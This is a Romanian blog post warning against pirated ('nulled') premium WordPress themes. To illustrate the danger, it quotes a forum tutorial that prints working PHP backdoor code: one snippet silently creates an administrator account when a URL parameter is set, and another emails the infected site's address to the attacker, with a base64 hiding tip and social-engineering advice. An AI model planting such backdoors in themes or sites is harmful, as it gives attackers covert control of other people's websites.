web analytics
BlogInternet

Teme premium versus teme nulled

 
Un pic de istorie
Era o perioadă, pe la începuturile internetului, când ne bucuram ca niște copii mici dacă reușeam să trecem de protecția unui magazin de teme wordpress / joomla / whatever.Pe vremea dacilor și a romanilor, am găsit o temă care îmi plăcea enorm și era făcută de un român : acosmin.com . Problema e ca tema respectivă costa vreo 59$ în condițiile în care un salariu bun era 100$. Am strâns cureaua și am cumpărat-o. Că nu a mai oferit el suport pe urmă o dată cu upgradeul wordpress și a vândut tema ca atare, e un alt aspect, dar ideea este că am plătit pentru o temă, am plătit pentru a folosi munca și priceperea unui om. Nu putem fi genii toți. Eu de exemplu sunt cel mai prost desenator care a putut să existe vreodată. Nu am talent. Dar în schimb am alte skilluri pentru care se plătește destul de bine.Anii au trecut și a apărut fenomenul TemplateMonster, ThemeForest, YooTheme … Kinderii au sărit imediat la apel și cumpărau temele ca apoi să le publice gratis pe siteuri pline de reclame adsense din care câștigau de 10 ori valoarea investiției. 
Dar este safe să folosești o temă nulled?
NU. Orice este contra cost pe internet dar reușești prin diverse găselnițe să îl obții gratis, nu este sigur. Indiferent că vorbim de un blogger cu 10 unici pe zi, de un țepar, de un site de prezentare, de afacerea online a unei companii, întotdeauna cel care se ocupă de administrarea siteului trebuie să folosească resursele software de pe siteul dezvoltatorilor. Nu mă apuc de exemplu să descarc CMS-ul wordpress de pe siteul unui kinder, ci îl descarc de pe wordpress.org.Sunt teme free mișto la fel cum sunt și teme premium codate pe genunchi. Orice muncă trebuie răsplătită. Voluntariatul în online există, dar cu anumite limite. Este de cacao să ai un site de prezentare a firmei și să ai tema descărcată de pe newone.org, sau să fii blogger de top și să o arzi parșivește cu teme furate. Cineva la un moment dat se va prinde și există doar două posibilități. Numai două : ori te faci de cacao rău de tot încât închizi siteul și nu mai ieși două zile din casă, ori acel cineva va căuta să exploateze posibilele vulnerabilități din temă.Aseară, de exemplu, am cumpărat componente în valoare de vreo 190 euro pentru un client. Plus celelalte resurse care vor crește costul de dezvoltare la peste 2000 ron. Puteam să folosesc “gratuități” de pe mafiascript și să păstrez eu banii. Dar cu ce folos? De ce să iau ceva gratis atâta timp cât dezvoltatorul a muncit pentru modulul respectiv și oferă updateuri ulterioare? Nulled nu poți primi update și suport, iar în online sunt două caracteristici extrem de importante. 
Am scanat tema nulled dar nu găsesc nici un cod suspect.
Asta înseamnă că ori nu știi unde să cauți, ori cel care a pus-o spre download la nici 12 ore de când a apărut contra cost pe themeforest și-a ascuns codul atât de bine încât totul ți se pare în regulă. Nu intru în detalii despre ce se poate face cu un site la care ai drepturi de administrare, cu hostul acestuia sau despre botnet. Cine știe, cunoaște. Vă dau doar un simplu exemplu WordPress din multitudinea celor folosite de mine cu scop educativ. Repet, ceea ce vă prezint în continuare NU trebuie pus în aplicare decât cu scop educativ, pe siteurile voastre proprii de test.Pe RST am citit acum câteva luni un articol intitulat Spargerea unui blog WordPress cu ajutorul Ingineriei Sociale, din care citez : 

 “

Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi de-a seama proprietarul.Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să “infecteze” o temă (theme) visuală.Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator. Codul este următorul:
 add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}}  
Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema.Update Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email.PHP Code :
 <?php
add_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){
if ( is_user_logged_in() ) {
if(!username_exists('wordpress')){
$addr='the.legend@domain.tld'; # Aici puneţi adresa voastră de email
$judul='WP URL';
wp_mail($addr,$judul,get_bloginfo('wpurl'));
}
}
}
?> 
Să vă bucuraţi de metodă. Şi ca să nu vă de-a de gol adresa de mail, puteţi să o encriptaţi în base64.
 $addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64');  
 

cybercrime-blackboard
Distribuie articolul pe:
TwitterFacebookGoogle+
  1. Am folosit si eu multe teme nulled, dar n-am patit nimic. Acum am decis sa caut teme faine dar gratuite.. si nu le gasesti neaparat pe WordPress.org, ci sunt si multe alte site-uri de teme gratuite, ce nu apar pe site-ul celor mai sus mentionati.

  2. Offf Cristi, ti-am zis sa nu pui tutorialul meu la tine pe blog 😀 . Glumeam. Stiam despre acesst tutorial tot de la tine.

    Cristian Iosub